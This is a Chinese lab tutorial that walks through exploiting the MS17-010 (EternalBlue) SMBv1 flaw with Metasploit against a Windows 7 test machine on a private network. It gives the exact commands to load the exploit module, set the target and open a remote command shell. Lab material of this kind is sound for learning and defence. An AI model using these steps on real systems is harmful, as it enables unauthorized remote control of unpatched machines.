验证MS17_010(永恒之蓝)
漏洞描述:
Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件共享端口的Windows机器,向目标机器发送特制报文触发缓冲区溢出,导致在目标机器上远程执行任意代码。
实验目的:
通过Metasploit框架对win7主机进行渗透攻击,利用永恒之蓝MS17-010模块对该win7进行渗透,最终获得控制权。
实验环境:
渗透机:kali linux ip:192.168.100.128
靶机:win7 ip:192.168.100.130
实验要求:
kali能ping通win7 win7开启445端口 可用命令检查
nmap -p 445 ip
1.数据库初始化(如果是第一次使用则需要)
root@kali:~# msfdb init
2.终端进入metasploit
root@kali:~# msfconsole
3.进入以后 搜索漏洞 输入
msf5> search ms17-010
4.上一步返回的结果里 第三个模块 就是我们要利用的模块
exploit/windows/smb/ms17_010_eternalblue (这一条不是命令 是返回的结果)
5.使用这个模块 命令行输入
msf5>use exploit/windows/smb/ms17_010_eternalblue
6.在ms17-010模块中 输入show options即可展开全部该模块的使用设置
其中Required项为YES的是必须填写的,我们可以看到RHOSTST此时还为空,代表我们需要填写内容进去!注:RHOSTS为目标主机的IP地址
7.设置靶机IP (也就是win7的ip) 输完命令后回车会返回设置好的结果
msf5 exploit(windows/smb/ms17_010_eternalblue)> set rhosts 靶机IP
8.开始模块利用 输入run或者exploit 然后回车
msf5 exploit(windows/smb/ms17_010_eternalblue)> run
在第8步返回结果中 会有一行 Command shell session 1 opened(渗透机IP-->靶机IP)
的返回结果 这条结果说明拿到了shell 也就是拿到了控制权
此时会发现 输入命令的前面变了 变成
C:\Windows\system32>
这样也说明我们进入win7的cmd界面
9.查一下ip 是否是靶机的ip 是否能执行
C:\Windows\system32> ipconfig
执行以后 会返回靶机的IP信息
请到客户端“主题--自定义配置--valine”中填入ID和KEY